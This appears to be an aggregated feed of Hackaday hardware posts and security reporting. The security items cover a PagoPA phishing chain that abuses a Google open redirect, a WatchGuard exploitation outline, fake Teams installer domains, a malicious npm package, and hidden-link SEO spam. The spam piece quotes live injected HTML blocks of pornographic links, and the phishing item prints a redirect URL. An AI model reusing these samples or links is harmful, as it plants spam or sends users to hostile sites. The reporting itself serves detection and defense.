
F/0.38 Camera Lens Made With Oil Immersion Microscope Objective


A photo of the camera.

Over on YouTube [Applied Science] shows us how to make an f/0.38 camera lens using an oil immersion microscope objective.

The f-number of a lens indicates how well it will perform in low-light. To calculate the f-number you divide the focal length by the diameter of the aperture. A common f-number is f/1.4 which is generally considered “fast”.

We are told the fastest commercial lens ever used had f/0.7 and was used by Stanley Kubrick to shoot the film Barry Lyndon which was recorded only with candle light.

A microscope objective is a crucial lens that gathers and magnifies light to form an image. It plays a key role in determining the quality and clarity of the final magnified image produced by a microscope.

In this case the microscope objective is optically coupled to the CMOS image sensor using a drop of oil. The oil has better refractive properties than an air-gap. In order to get the closest coupling possible the protective glass sheet on the top of the image sensor was removed. This process resulted in a lot of broken image sensors! Apparently the yield was only two working image sensors from eight attempts at removing the glass.

Of course we’ve seen f-number hacking here at Hackaday before, such as with the A Low F Number Lens, From Scratch which achieved f/0.5.



hackaday.com/2025/10/17/f-0-38…


2025 Component Abuse Challenge: Boosting Voltage With Just a Wire


Switching power supplies are familiar to Hackaday readers, whether they use a fairly conventional transformer or are a buck, boost, or flyback design. There’s nearly always an inductor involved, whose rapid change in magnetic flux is harnessed to do voltage magic. [Craig D] has made a switching voltage booster that doesn’t use an inductor; instead it uses a length of conductor, and no, it’s not using the inductance of that conductor as a store of magnetic flux.

Instead it’s making clever use of reflected short pulses in a transmission line for its operation. Electronics students learn all about this in an experiment in which they fire pulses down a length of coax cable and observe their reflections on an oscilloscope, and his circuit is very similar but with careful selection of pulse timing. The idea is that instead of reflected pulses canceling out, they arrive back at the start of the conductor just in time to meet a pulse transition. This causes them to add rather than subtract, and the resulting higher voltage pulse sets off down the conductor again to repeat the process. We can understand the description, but this is evidently one to sit down at the bench and experiment with to fully get to grips with.

[Craig]’s conductor is an alternative to a long coil of coax: a home-made delay line of the type once found in the luminance circuit of some color TVs. It’s a coaxial cable in which the outer is formed of a tightly wound coil rather than a solid tube. With it and a high-speed gate driver he can light a couple of neon bulbs, a significant step-up, we think. We’re trying to work out which component is being abused here (other than the gate driver chip he blows), as the conductor is simply performing its natural function. Either way it’s a clever and unexpected circuit, and if it works, we like it.

This project is part of the Hackaday Component Abuse Challenge, in which competitors take humble parts and push them into applications they were never intended for. You still have time to submit your own work, so give it a go!

2025 Hackaday Component Abuse Challenge


hackaday.com/2025/10/17/2025-c…


Hackaday Podcast Episode 342: Poopless Prints, Radio in Your Fillings, and One Hyperspectral Pixel at a Time


It was Elliot and Dan on the podcast today, taking a look at the best the week had to offer in terms of your hacks. We started with surprising news about the rapidly approaching Supercon keynote; no spoilers, but Star Trek fans such as we who don’t have tickets will be greatly disappointed.

Elliot waxed on about taking the poop out of your prints (not pants), Dan got into a camera that adds a dimension to its images, and we both delighted in the inner workings of an air-powered squishy robot.

Questions? We’ve got plenty. Is it possible to take an X-ray without an X-ray tube? Or X-rays, for that matter? Did Lucille Ball crack a spy ring with her fillings? Is Algol set to take over the world? What’s inside a germanium transistor? How does a flipping fish say Happy Birthday? And how far down the Meshtastic rabbit hole did our own Tom Nardi fall? Tune in to find out the answers.


Download this free-range, cruelty-free MP3.


Episode 342 Show Notes:


What’s that Sound?


  • Congrats to [James Barker] for picking the sound of a rake!




hackaday.com/2025/10/17/hackad…


DIY Telescope Uses Maker Tools


You’ve got a laser cutter. You’ve got a 3D printer. What do you make? [Ayushmaan45] suggests a telescope. The modest instrument isn’t going to do serious astronomy with only 8X worth of optics, but it would make a fine spyglass for a youngster.

The body is cut from MDF, and there are only a few 3D printed parts. The only other things you need are rubber bands and a pair of lenses. You don’t even need glue. We might have spray painted the inside of the scope black or used some black contact paper to cut down on reflections, although it probably wouldn’t make much difference.

Of course, depending on your lenses, you may have to make some changes. Or find new lenses, for that matter. We like that it doesn’t take any exotic parts. We also appreciate that it is easy for kids to take apart and put back together. It would be interesting to see how a motivated kid might alter the design, as well.

If a kid gets interested, you could move on to a more sophisticated telescope. Or maybe you’d prefer a nice microscope.


hackaday.com/2025/10/17/diy-te…


Phishing against PagoPA: new campaign abuses Google open redirect


CERT-AGID has detected a new variant of phishing targeting PagoPA.

The campaign, still themed around traffic fines like the previous ones, this time exploits an open redirect mechanism on legitimate Google domains to make the messages more credible and bypass automated checks.

How the mechanism works


At first glance the malicious link

hxxps://adservice.google.be/clk/408533097;208818505;l;?//sitomalevolo.tld/pagina

appears to lead to a Google service, but in reality the final parameter allows an open redirect, i.e. it redirects to any URL on a third-party domain.

The compromise chain proceeds through the following steps


The URL begins with a Google subdomain (adservice.google.be) used as bait, taking advantage of the brand’s reputation to make the link appear safe.

The Google adservice subdomain redirects to an intermediate page hosted on bio.site, a legitimate platform for creating presentation pages with custom links, similar to Linktree, which has itself been exploited in several phishing campaigns.
Intermediate site used by the criminals
In this case the criminals built a page that reproduces the PagoPA logo and refers to allegedly unpaid traffic violations, inviting the user to click a button labelled “Accedi al servizio di regolamento” (“Access the settlement service”).

The button in turn redirects the user to the actual phishing page, which graphically imitates the official portal and collects personal data and payment card details. The resource is hosted on privatedns.org, a legitimate service that offers free subdomain registration to third parties, often used for temporary projects or tests but frequently abused by malicious actors because it allows the creation of addresses that are hard to trace or block centrally.
Final phishing page
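The chain described above can be checked mechanically on inbound links. The following Python is an added example, not CERT-AGID’s or Red Hot Cyber’s tooling: it normalises a defanged link, extracts any URL embedded in the query string (the protocol-relative ?//host form seen here, and also the common ?url= form, which goes beyond this case) and reports when a trusted bait host forwards to a different site. The BAIT_HOSTS list and the two-label site comparison are assumptions made for the example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Hosts whose reputation phishing kits borrow as bait. The adservice
# subdomains are the ones named in the report; the list is an assumption
# for this example, extend it with the brands you trust.
BAIT_HOSTS = ("adservice.google.be", "adservice.google.de",
              "adservice.google.it", "adservice.google.com")

# Defanged schemes used in reports are normalised back to real ones.
DEFANG = {"hxxp": "http", "hxxps": "https"}


def _candidate_targets(query):
    """Yield every piece of the query string that could name another host."""
    q = unquote(query)
    if q.startswith("//"):            # observed form: "?//host/path"
        yield q
    for _key, value in parse_qsl(query, keep_blank_values=True):
        yield unquote(value)          # conventional "?url=https://host/..."
    for m in re.finditer(r"(?:https?:)?//[^\s&]+", q):
        yield m.group(0)              # anything else URL-shaped


def embedded_host(fragment):
    """Return the host named by a URL-looking fragment, or None."""
    f = fragment.strip()
    if f.startswith("//"):
        f = "https:" + f
    if not re.match(r"^https?://", f):
        return None
    host = urlsplit(f).hostname
    return host.lower() if host else None


def same_site(a, b):
    """Crude registrable-domain comparison: last two labels (assumption)."""
    return a.split(".")[-2:] == b.split(".")[-2:]


def analyse_link(url):
    """Classify one URL.

    verdict: 'open_redirect'   a known bait host forwards to another site
             'external_target' any host forwards off-domain
             'clean'           no off-domain target found in the query
    """
    scheme, _, rest = url.partition("://")
    if not rest:                      # no scheme given: assume https
        scheme, rest = "https", scheme
    scheme = DEFANG.get(scheme.lower(), scheme.lower())
    parts = urlsplit(f"{scheme}://{rest}")
    src = (parts.hostname or "").lower()
    for frag in _candidate_targets(parts.query):
        dst = embedded_host(frag)
        if dst and not same_site(src, dst):
            verdict = "open_redirect" if src in BAIT_HOSTS else "external_target"
            return {"verdict": verdict, "bait_host": src, "target_host": dst}
    return {"verdict": "clean", "bait_host": src, "target_host": None}


if __name__ == "__main__":
    # The defanged link quoted in the report.
    print(analyse_link("hxxps://adservice.google.be/clk/408533097;208818505;l;"
                       "?//sitomalevolo.tld/pagina"))
```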

This type of approach is not new


A similar case had already been documented in 2023 on the web-inspection.de site, which reported the same abuse of Google domains, in particular adservice.google.de, but the behaviour is also present on the equivalent .it and .com domains.

The analysis, titled “INSPECTION finds Open Redirect Fraud on Google Pages”, describes the same scheme observed today: open redirects, indexing of manipulated links and the use of cloaking to hide fraudulent content.

However, in the current case it is not cloaking in the strict sense: the page hosted on bio.site does not vary its content depending on the visitor, but rather represents a deceptive use of a legitimate service as an intermediate step, exploited to win the user’s trust and bypass automated security checks.

Data on PagoPA phishing


Since March 2025, when the first campaign on this theme was identified, CERT-AGID has detected 220 phishing campaigns attributable to abuse of PagoPA, thanks also to the daily reports sent in by affected users.
Trend of PagoPA phishing campaigns (March to October 2025)
Overall, 2,574 Indicators of Compromise (IoC) were produced and shared with public administrations and accredited entities, to support the timely blocking of fraudulent sites.

The article “Phishing against PagoPA: new campaign abuses Google open redirect” originally appeared on Red Hot Cyber.


This Week in Security: F5, SonicWall, and the End of Windows 10


F5 is unintentionally dabbling in releasing the source code behind their BIG-IP networking gear, announcing this week that an unknown threat actor had access to their internal vulnerability and code tracking systems. This security breach was discovered on August 9th, and in the time since, F5 has engaged with CrowdStrike, Mandiant, and NCC Group to review what happened.

So far it appears that the worst result is access to unreleased vulnerabilities in the F5 knowledge management system. This means that any unpatched vulnerabilities were effectively 0-days, though the latest set of patches for the BIG-IP system has fixed those flaws. There aren’t any reports of those vulnerabilities being exploited in the wild, and F5 has stated that none of the leaked vulnerabilities were critical or allowed for remote exploitation.

Slightly more worrying is that this access included the product development environment. The problem there isn’t particularly the leak of the source code — one of the covered projects is NGINX, which is already open source software. The real danger is that changes could have been surreptitiously added to those codebases. The fact that NGINX is Open Source goes a long way to alleviate that danger, and when combined with the security built into tools like git, it seems very unlikely that malicious code could be sneaked into the NGINX public code base. A thorough review of the rest of the F5 codebases has similarly come up negative, and so far it looks like the supply-chain bullet has been dodged.

WatchGuard Out of Bounds


WatchGuard’s Fireware OS has a stack buffer overflow. There are a few interesting details about this story. The first, as WatchTowr researchers gleefully point out, is that it’s 2025 and a security vendor has a stack overflow bug straight out of the ’90s. But second, this is one of the first vulnerabilities we’ve covered that has a CVSS 4.0 score. In CVSS 3 terms, this would be a severity 10 vulnerability. As the 4th iteration of the Common Vulnerability Scoring System also measures the impact on the rest of the network, it scores a bit lower, 9.3, there, though one could probably make an argument that it should be higher.

The actual vulnerability is in the VPN service, and it’s as simple as it gets. An attacker-controlled buffer is copied into a fixed-length memory region without any bounds checking. That VPN service uses an IKEv2 handshake protocol to establish connections, and the server responds with an odd Base64-encoded string. Decode the string, and it turns out the vulnerable service announces VN=12.11.3 BN=719894, the version number and build string, allowing for super easy identification of vulnerable targets.

The final step in turning this into a true vulnerability is to corrupt the stack, take control of the program counter, and Return-Oriented-Program your way through a couple gadgets to be able to call system(). Right? This platform doesn’t turn on every mitigation — stack canaries and position independent execution are noticeably missing. But there are some good hardening steps that were done, like leaving out /bin/sh altogether. How do you run shellcode when the machine doesn’t have a shell at all? The answer the WatchTowr crew turned to was to run the system code in the Python3 shell. Thinking outside the box!

SonicWall and Unintentional Distributed Backups


About a month ago, we shared the news that SonicWall had a breach of their own, with a limited number of customer backups being exposed. At the time, the word was that fewer than 5% of customers would be affected. That estimate seems to have been a bit optimistic, as SonicWall is now recommending that all customers step through their new remediation playbook, which calls for a complete cycling of all credentials stored on SonicWall devices.

It’s unclear if this is because more configuration data was accessible than was previously believed, or because attackers are actively using the pilfered data in attacks against SonicWall customers. The unintentional distribution of system backups turns out not to have been a good strategy.

UEFI Backdoor


UEFI and Secure Boot have been viewed with skepticism, particularly by Linux enthusiasts over the years. There is, however, something to be said for the idea that your computer won’t boot a manipulated OS without your permission, and especially since major Linux distros have access to signed Secure Boot keys, it hasn’t been the dystopian disaster that many of us feared. The security question of the UEFI root of trust has had its own problems, and one of those problems has recently bitten Framework laptops. The issue is the mm (Memory Modify) command that can optionally be built into UEFI shells. This is strictly for debugging purposes, and it’s been discovered that allowing arbitrary access to system memory is not great for system security.

Eclypsium researchers are calling this one BombShell, and it boils down to overwriting the security handler pointer in the UEFI firmware, so that all Secure Boot checks are disabled. This level of tampering appears to be invisible to the system and the booted OS, and with just a bit of cleverness it can be injected as a permanent boot payload. While it’s specifically Framework laptops that are in question with this disclosure, it’s not strictly a Framework issue: it can affect any UEFI machine that ships a signed UEFI shell that includes dangerous commands like mm.

Hack a Car Company, and All the Cars


We have a delightful hack from Def Con 33, where an as-yet-unnamed car brand had a couple of security problems with their admin web portal, and those problems are pretty serious when put together. First, the invite-only dealer portal didn’t actually verify the invite tokens. And second, when creating an account, the back-end didn’t actually check the account creation details. Meaning that anyone who knew where to look could create an admin account.

The result was that a VIN could be used to look up a car and access the owner’s details, or the system could be searched by owner information to find vehicle information. It also allowed transferring the authentication of a vehicle to a new mobile app account, and the mobile app could then be used to unlock the vehicle.


Windows 10


It’s time to turn out the lights, the party is over. The sun has set and Windows 10 has entered its twilight. The advice from every other legacy OS applies: upgrade if you can. Yes, there are some frustrating problems with upgrading to Windows 11, particularly if your machine is just too old to have a TPM or Secure Boot.

If you’re stuck on Windows 10, there’s good news and bad news. The good news is that Microsoft is making security updates available for free, for many computers, if you use a Microsoft account on the machine. The bad news is that those updates are a monthly trickle of fresh vulnerabilities that some machines just won’t ever get patched for.

Bits and Bytes


What do you do when you’re flying, and you’re too cheap, er, frugal to pay for in-flight wifi? Naturally, find some way to tunnel out for free. The key is usually DNS. It’s probably the inverse of the meme that the problem is always DNS, as that’s the last thing a security hardening team wants to break. And if that won’t work, there’s always MAC address cloning.

Many a pen test has hit a brick wall when faced with a gRPC endpoint. Google’s Remote Procedure Call framework is binary, and without reflection turned on it is extremely difficult to map which calls are available. There’s a new tool, grpc-scan, that just might shed some light on the subject. It combines common design patterns with careful parsing of the returned errors to learn about the system.

And finally, where’s the most bulletproof place you can host some malicious code? A server in Russia? Apparently it’s now on the blockchain. This isn’t a theoretical attack from a security thinktank, but a real-world malware campaign believed to originate from North Korean hackers. Yet another red flag to watch out for in smart contracts!


hackaday.com/2025/10/17/this-w…


Microsoft blocks Vanilla Tempest: fake Teams installers were spreading Rhysida ransomware


In early October 2025, Microsoft disrupted a large malicious operation attributed to the Vanilla Tempest group, revoking more than 200 digital certificates used to fraudulently sign Microsoft Teams installation files.

These fake packages served as the vector for delivering the Oyster backdoor and, subsequently, the Rhysida ransomware.

The discovery and the countermeasures


The campaign was identified at the end of September 2025, after months of activity in which the threat actor had exploited apparently legitimate binary files.

In response, Microsoft Defender Antivirus updated its signatures to recognize and block both the fake Teams installers and the malware involved, while Microsoft Defender for Endpoint was enhanced to detect the tactics, techniques and procedures (TTPs) typical of Vanilla Tempest.

The group’s profile


Vanilla Tempest, also known by the aliases VICE SPIDER or Vice Society in other security reports, is a financially motivated cybercriminal group. Its operations focus on ransomware attacks and the theft of sensitive data for extortion. Over time it has distributed several payloads, including BlackCat, Quantum Locker and Zeppelin, but in recent months it has shifted mainly to Rhysida.

The attack technique


During the campaign, the criminals distributed fake files named MSTeamsSetup.exe, hosted on malicious domains that imitated official Microsoft Teams sites, such as teams-download[.]buzz, teams-install[.]run and teams-download[.]top.
Users were presumably directed to these sites through SEO poisoning attacks, a technique that manipulates search engine results so that the infected domains appear among the top results.

Once executed, the fake installer spawned a loader which in turn installed Oyster, a backdoor already used by Vanilla Tempest since June 2025, but which the group began to fraudulently sign digitally from September 2025.

To lend apparent legitimacy to the distributed files, Vanilla Tempest abused Trusted Signing services and the certificate authorities SSL[.]com, DigiCert and GlobalSign, thereby initially evading security checks.

Microsoft’s response


Microsoft stated that Defender Antivirus, when fully enabled, is able to block the entire attack chain. In addition, Defender for Endpoint provides analysis and mitigation tools to help organizations investigate possible compromises.
The company publicly shared the technical details of the operation to strengthen cooperation within the cybersecurity community and improve the collective capability to respond to this type of threat.

The article “Microsoft blocks Vanilla Tempest: fake Teams installers were spreading Rhysida ransomware” originally appeared on Red Hot Cyber.


Arturo Di Corinto presents Fortinet’s Security Days


It was nice to host Fortinet’s Security Days in Milan.
Great atmosphere, excellent organization, excellent speakers.
There were 1,500 people in the room. A record.

It was not hard to manage the whole day, since the speakers were all good. Starting with Massimo Palermo, vice president of Fortinet, an economist on loan to cybersecurity.

Everything began with a spectacular talk by Roberto Caramia, head of CSIRT Italia (yes, we are friends and I hold him in high regard).

I greatly appreciated the analysis by Filippo Cassini and Aldo Di Mattia of emerging threats, and of AI in particular, as well as the stimulating talk by Stefano Mele, who spoke about regulation as a factor in building trust. Also fine and provocative was the talk by another colleague and friend, Alessandro Curioni, who lashed the technological hype that comes at the expense of understanding the technology itself.

But the panels were also good, those with the partners and with the women. On stage I was able to interview, without a safety net, the CISO of Juventus, Mirko Rinaldini, the CIO of Bpm, Adolfo Pellegrino, the CTO of Prysmian, Alessandro Bottin, and Sapio’s Riccardo Salierno (a delightful person). Four Italian champions.

Thanks also to Greta Nasi, Selene Giupponi and the Andrea Bocelli Foundation, who spoke to us about gender equality, salaries and burnout.

Heartfelt thanks to them and to the Polizia di Stato (Tx Rocco Nardulli) for what they do in the field of cyber education.

Dear Valentina Sudano, you did a great job with your whole team.


dicorinto.it/articoli/arturo-d…


Site of Secret 1950s Cold War Iceworm Project Rediscovered


The overall theme of the early part of the Cold War was that of subterfuge — with scientific missions often providing excellent cover for placing missiles right on the USSR’s doorstep. Recently NASA rediscovered Camp Century while testing an airplane-based synthetic aperture radar instrument (UAVSAR) over Greenland. Although it was established on the surface in 1959 as a polar research site, and actually produced good science from e.g. ice core samples, beneath this benign surface was the secretive Project Iceworm.

By 1967 the base had to be abandoned due to shifting ice, which would eventually bury the site under more than 30 meters of ice. Before that, the scientists tested out the PM-2A small modular reactor. It not only provided 2 MW of electrical power and heat to the base, but was itself subjected to various experiments. Alongside this public face, Project Iceworm sought to set up a network of mobile nuclear missile launch sites for Minuteman missiles. These would be located below the ice sheet, capable of surviving a first-strike scenario by the USSR. A lack of Danish permission, among other complications, led to the project eventually being abandoned.

It was this base that popped up during the NASA scan of the ice bed. Although it was thought that the crushed remains would be safely entombed, it’s estimated that by the year 2100 global warming will have led to the site being exposed again, including the thousands of liters of diesel and tons of hazardous waste that were left behind back in 1967. The positive news here is probably that with this SAR instrument we can keep much better tabs on the condition of the site as the ice cap continues to grind it into a fine paste.


Top image: Camp Century in happier times. (Source: US Army, Wikimedia)


hackaday.com/2025/10/17/site-o…


Post-exploitation framework now also delivered via npm



Incident description


The first version of the AdaptixC2 post-exploitation framework, which can be considered an alternative to the well-known Cobalt Strike, was made publicly available in early 2025. In spring 2025, the framework was first observed being used for malicious purposes.

In October 2025, Kaspersky experts found that the npm ecosystem contained a malicious package with a fairly convincing name: https-proxy-utils. It was posing as a utility for using proxies within projects. At the time of this post, the package had already been taken down.

The name of the package closely resembles those of popular legitimate packages: http-proxy-agent, which has approximately 70 million weekly downloads, and https-proxy-agent, with 90 million. Furthermore, the advertised proxy-related functionality was cloned from another popular legitimate package, proxy-from-env, which boasts 50 million weekly downloads. However, the threat actor injected a post-install script into https-proxy-utils that downloads and executes a payload containing the AdaptixC2 agent.

Metadata for the malicious (left) and legitimate (right) packages

OS-specific adaptation


The post-install script includes payload delivery methods for Windows, Linux, and macOS. On each OS, it uses a specific technique involving system or user directories to drop and launch the implant.

On Windows, the AdaptixC2 agent is dropped as a DLL file into the system directory C:\Windows\Tasks and executed via DLL sideloading: the JS script copies the legitimate msdtc.exe file to the same directory and runs it, which loads the malicious DLL.

Deobfuscated Windows-specific code for loading AdaptixC2

In macOS, the script downloads the payload as an executable file into the user’s autorun directory: Library/LaunchAgents. The postinstall.js script also drops a plist autorun configuration file into this directory. Before downloading AdaptixC2, the script checks the target architecture (x64 or ARM) and fetches the appropriate payload variant.

Deobfuscated macOS-specific code for loading AdaptixC2

In Linux, the framework’s agent is downloaded into the temporary directory /tmp/.fonts-unix. The script delivers a binary file tailored to the specific architecture (x64 or ARM) and then assigns it execute permissions.

Deobfuscated Linux-specific code for loading AdaptixC2

Once the AdaptixC2 framework agent is deployed on the victim’s device, the attacker gains capabilities for remote access, command execution, file and process management, and various methods for achieving persistence. This both allows the attacker to maintain consistent access and enables them to conduct network reconnaissance and deploy subsequent stages of the attack.

Conclusion


This is not the first attack targeting the npm registry in recent memory. A month ago, similar infection methods utilizing a post-install script were employed in the high-profile incident involving the Shai-Hulud worm, which infected more than 500 packages. The AdaptixC2 incident clearly demonstrates the growing trend of abusing open-source software ecosystems, like npm, as an attack vector. Threat actors are increasingly exploiting the trusted open-source supply chain to distribute post-exploitation framework agents and other forms of malware. Users and organizations involved in development or using open-source software from ecosystems like npm in their products are susceptible to this threat type.

To stay safe, be vigilant when installing open-source modules: verify the exact name of the package you are downloading, and more thoroughly vet unpopular and new repositories. When using popular modules, it is critical to monitor frequently updated feeds on compromised packages and libraries.

Indicators of compromise


Package name
https-proxy-utils



securelist.com/adaptixc2-agent…


A New Golden Age of Browser Games


Arguably, the golden age of browser gaming occurred in the 00s, mostly revolving around Adobe Flash. This was an era of high creativity and a low barrier to entry, decentralized from gatekeeping app stores. Sadly, these times have passed us by, as the security concerns around Flash led to its discontinuation and most casual gamers have migrated to the app store for their fix. But that doesn’t stop some from continuing to bring gaming to the browser, even if those games were never intended for it in the first place, like this browser port of Celeste.

Celeste is an indie platformer where the player climbs a mysterious mountain while confronting her inner struggles. Originally meant for consoles and PC, a group of friends including [velzie], [bomberfish], and [Toshit] aka [r58Playz] took this as a challenge especially after seeing someone else’s half finished web port of this game. Most of the build revolves around WebAssembly (wasm) and around “cursed” .NET runtime hacks which also allow the port to run the community-made Everest mod loader. It uses a multithreaded and JIT compiling version of mono-wasm backported from .NET 10 to .NET 9 to maximize performance. The team actually first started by porting Terraria to the browser, and then moved on to this Celeste port from there.

The port of Celeste can be played here, and their port of Terraria is also available, although they may not stand up to a ton of Hackaday traffic, so some patience is advised. There are GitHub repositories for Celeste and Terraria as well. With impressive ports of relatively modern games moving into the browser, perhaps we’re entering a new golden age of browser gaming; we’ve also seen things like Minecraft implemented in only HTML and CSS lately.


hackaday.com/2025/10/17/a-new-…


SEO spam and hidden links: how to protect your website and your reputation


When analyzing the content of a website in an attempt to determine which category it belongs to, we sometimes get an utterly unexpected result. It could be the official page of a metal structures manufacturer or an online flower shop, or, say, a law firm website, with completely neutral content, but our solutions would place it squarely in the “Adult content” category. On the surface, it is completely unclear how our systems arrived at that verdict, but one look at the content categorization engine’s page analysis log clears it up.

Invisible HTML block, or SEO spam


The website falls into the questionable category because it contains an HTML block with links to third-party sites, invisible to regular users. These sites typically host content of a certain kind – which, in our experience, is most often pornographic or gambling materials – and in the hidden block, you will find relevant keywords along with the links. These practices are a type of Black Hat SEO, or SEO spam: the manipulation of website search rankings in violation of ethical search engine optimization (SEO) principles. Although there are many techniques that attackers use to raise or lower websites in search engine rankings, we have encountered hidden blocks more frequently lately, so this is what this post focuses on.

Website owners rarely suspect a problem until they face obvious negative consequences, such as a sharp drop in traffic, warnings from search engines, or complaints from visitors. Those who use Kaspersky solutions may see their sites blocked due to being categorized as prohibited, a sign that something is wrong with them. Our engine detects both links and their descriptions that are present in a block like that.

How hidden links work


Hyperlinks that are invisible to regular users but still can be scanned by various analytical systems, such as search engines or our web categorization engine, are known as “hidden links”. They are often used for scams, inflating website rankings (positions in search results), or pushing down the ranking of a victim website.

To understand how this works, let us look at how today’s SEO functions in the first place. A series of algorithms is responsible for ranking websites in search results, such as those served by Google. The oldest and most relevant one to this article is known as PageRank. The PageRank metric, or weight in the context of this algorithm, is a numerical value that determines the importance of a specific page. The higher the number of links from other websites pointing to a page, and the greater those websites’ own weights, the higher the page’s PageRank.

So, to boost their own website’s ranking in search results, the malicious actor places hidden links to it on the victim website. The higher the victim website’s PageRank, the more attractive it is to the attacker. High-traffic platforms like blogs or forums are of particular interest to them.

However, PageRank is no longer the only method search engines use to measure a website’s value. Google, for example, also applies other algorithms, such as the artificial intelligence-based RankBrain or the BERT language model. These algorithms use more sophisticated metrics, such as Domain Authority (that is, how much authority the website has on the subject the user is asking about), link quality, and context. Placing links on a website with a high PageRank can still be beneficial, but this tactic has a severely limited effect due to advanced algorithms and filters aimed at demoting sites that break the search engine’s rules. Examples of these filters are as follows:

  • Google Penguin, which identifies and penalizes websites that use poor-quality or manipulative links, including hidden ones, to boost their own rankings. When links like these are detected, their weight can be zeroed out, and the ranking may be lowered for both sites: the victim and the spam website.
  • Google Panda, which evaluates content quality. If the website has a high PageRank, but the content is of low quality, duplicated, auto-generated, or otherwise substandard, the site may be demoted.
  • Google SpamBrain, which uses machine learning to analyze HTML markup, page layouts, and so forth to identify manipulative patterns. This algorithm is integrated into Google Penguin.
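To make the weight-passing mechanism described above concrete, here is an added toy model (not from the Securelist post): power-iteration PageRank over a constructed four-page graph, computed before and after a hidden link from the victim to the promoted site is injected. A nofollow link, or one whose weight a filter such as Penguin has zeroed out, is modelled as an edge that is simply absent from the graph. The page names, the graph and the 0.85 damping factor are assumptions.

```python
def pagerank(pages, links, damping=0.85, iterations=200):
    """Power-iteration PageRank over (source, target) links.
    A page with no outgoing links (dangling node) spreads its weight evenly."""
    n = len(pages)
    out = {p: [] for p in pages}
    for src, dst in links:
        out[src].append(dst)
    rank = {p: 1.0 / n for p in pages}
    for _ in range(iterations):
        dangling = sum(rank[p] for p in pages if not out[p])
        new = {p: (1 - damping) / n + damping * dangling / n for p in pages}
        for src, targets in out.items():
            for dst in targets:  # each outgoing link carries an equal share
                new[dst] += damping * rank[src] / len(targets)
        rank = new
    return rank


# Constructed graph (an assumption): "victim" is a page other sites link to,
# "victim/blog" an internal page it promotes, "spam" the site being pushed.
PAGES = ["victim", "victim/blog", "other", "spam"]
CLEAN_LINKS = [("other", "victim"), ("victim/blog", "victim"), ("victim", "victim/blog")]
INJECTED_LINK = ("victim", "spam")  # the hidden <a href=... rel="dofollow">


def ranks_before_and_after(rel="dofollow"):
    """Ranks without the hidden link and with it. With rel="nofollow" (or a
    link whose weight has been zeroed out) the edge carries nothing, so it is
    left out of the graph entirely."""
    before = pagerank(PAGES, CLEAN_LINKS)
    links = CLEAN_LINKS + ([] if rel == "nofollow" else [INJECTED_LINK])
    return before, pagerank(PAGES, links)


if __name__ == "__main__":
    before, after = ranks_before_and_after()
    for page in PAGES:
        print(f"{page:12s} before={before[page]:.3f} after={after[page]:.3f}")
```

The run shows the spam page jumping from a near-floor rank to roughly the level of the victim's own internal page, which is the weight that the hidden block siphons off.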


What a Black Hat SEO block looks like in a page’s HTML markup


Let us look at some real examples of hidden blocks we have seen on legitimate websites and determine the attributes by which these blocks can be identified.

Example 1

<div style="display: none;">
افلام سكس اعتصاب <a href="https://www.azcorts.com/" rel="dofollow" target="_self">azcorts.com</a> قنوات جنسية
free indian porn com <a href="https://porngun.mobi" target="_self">porngun.mobi</a> xharmaster
石原莉紅 <a href="https://javclips.mobi/" target="_blank" title="javclips.mobi">javclips.mobi</a> ちっぱい
bank porn <a href="https://pimpmpegs.net" target="_self" title="pimpmpegs.net free video porn">pimpmpegs.net</a> wwwporm
salamat lyrics tagalog <a href="https://www.teleseryeone.com/" target="_blank" title="teleseryeone.com sandro marcos alexa miro">teleseryeone.com</a> play desi
</div>
<div style="display: none;">
كسى بيوجعنى <a href="https://www.sexdejt.org/" rel="dofollow">sexdejt.org</a> سكس سانى
indian sex video bp <a href="https://directorio-porno.com/" rel="dofollow" target="_self" title="directorio-porno.com">directorio-porno.com</a> xvideos indian pussy
swara bhaskar porn <a href="https://greenporn.mobi" title="greenporn.mobi lesbian porn hq">greenporn.mobi</a> kannada sexy video
bp sex full <a href="https://tubepornmix.info" target="_blank" title="tubepornmix.info aloha tube porn video">tubepornmix.info</a> lily sex
pinayflix pamasahe <a href="https://www.gmateleserye.com/" rel="dofollow" target="_blank">gmateleserye.com</a> family feud november 17
</div>
<div style="display: none;">
sunny leone ki bp download <a href="https://eroebony.info" target="_self" title="eroebony.info">eroebony.info</a> hansika xvideos
موقع سكس ايطالى <a href="https://bibshe.com/" target="_self" title="bibshe.com سكس العادة السرية">bibshe.com</a> صور احلى كس
raja rani coupon result <a href="https://booketube.mobi" rel="dofollow">booketube.mobi</a> exercise sex videos
indianbadwap <a href="https://likeporn.mobi" rel="dofollow" target="_blank" title="likeporn.mobi free hd porn">likeporn.mobi</a> rabi pirzada nude video
marathi porn vidio <a href="https://rajwap.biz" rel="dofollow" target="_blank" title="rajwap.biz">rajwap.biz</a> www.livesex.com
</div>

This example utilizes a simple CSS style, <div style="display: none;">. This is one of the most basic and widely known methods for concealing content; the parameter display:none; stands for “do not display”. We also see that each invisible <div> section contains a set of links to low-quality pornographic websites along with their keyword-stuffed descriptions. This clearly indicates spam, as the website where we found this block has no relation whatsoever to the type of content being linked to.
Another sign of Black Hat SEO in the example is the attribute rel="dofollow". This instructs search engines that the link carries link juice, meaning it passes weight. Spammers intentionally set this attribute to transfer authority from the victim website to the ones they are promoting. In standard practice, webmasters may, conversely, use rel="nofollow", which signifies that the presence of the link on the site should not influence the ranking of the website where it leads.

Thus, the combination of a hidden block (display:none;) and a set of external pornographic (in this instance) links with the rel="dofollow" attribute unequivocally points to an SEO spam injection.

Note that all <div> sections are concentrated in one spot, at the end of the page, rather than scattered throughout the page code. This block demonstrates a classic Black Hat SEO approach.

Example 2

<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">سكس انجليز <a href="https://wfporn.com/" target="_self" title="wfporn.com افلام سحاق مترجم">wfporn.com</a> سكس كلاسيك مترجم</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">فيلم سكس <a href="https://www.keep-porn.com/" rel="dofollow" target="_blank">keep-porn.com</a> سكس هندى اغتصاب</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">desi nude tumbler <a href="https://www.desixxxv.net" title="desixxxv.net free hd porn video">desixxxv.net</a> kanpur sexy video</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">www wap sex video com <a href="https://pornorado.mobi" target="_self">pornorado.mobi</a> sexy film video mp4</div>
<div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">mom yes porn please <a href="https://www.movsmo.net/" rel="dofollow" title="movsmo.net">movsmo.net</a> yes porn please brazzers</div>
